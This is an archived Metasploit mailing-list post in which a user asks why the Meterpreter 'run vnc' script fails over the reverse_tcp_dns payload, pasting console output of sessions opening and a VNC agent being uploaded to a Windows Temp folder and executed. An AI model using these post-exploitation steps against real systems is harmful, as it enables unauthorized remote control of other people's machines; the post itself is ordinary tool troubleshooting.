Home page logo
/

metasploit logo Metasploit mailing list archives

VNC fails if PAYLOAD is meterpreter/reverse_tcp_dns
From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Thu, 15 Apr 2010 06:54:47 +0300

"run vnc" from a meterpreter prompt will not work for me when using the
reverse_tcp_dns payload

msf exploit(handler) >
[*] Sending stage (748032 bytes) to 78.xxx.xxx.xxx
[*] Meterpreter session 5 opened (192.168.1.65:443 -> 78.xxx.xxx.xxx:56420)

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.65 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 37888 bytes long
[*] Uploaded the VNC agent to
C:\Users\SHERIF~1\AppData\Local\Temp\IuOaDcyTLsx.exe (must be deleted
manually)
[*] Executing the VNC agent with endpoint 192.168.1.65:4545...
[-] Error in script: Rex::Post::Meterpreter::RequestError
stdapi_sys_process_execute: Operation failed: 2

meterpreter > run vnc -t
[*] Creating a VNC bind tcp stager: RHOST=127.0.0.1 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 37888 bytes long
[*] Uploaded the VNC agent to
C:\Users\SHERIF~1\AppData\Local\Temp\dPPtSyP.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.65:4545...
[-] Error in script: Rex::Post::Meterpreter::RequestError
stdapi_sys_process_execute: Operation failed: 2

meterpreter > run vnc -t -p 443
[*] Creating a VNC bind tcp stager: RHOST=127.0.0.1 LPORT=443
[*] Running payload handler

[*] Sending stage (748032 bytes) to 127.0.0.1
[*] VNC stager executable 37888 bytes long
[*] Uploaded the VNC agent to
C:\Users\SHERIF~1\AppData\Local\Temp\RzlDtPsxM.exe (must be deleted
manually)
[*] Executing the VNC agent with endpoint 192.168.1.65:443...
[-] Error in script: Rex::Post::Meterpreter::RequestError
stdapi_sys_process_execute: Operation failed: 2


I tried also -t and -r with same results, Am I doing something wrong? of
course it's working fine if i use meterpreter/reverse_tcp
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault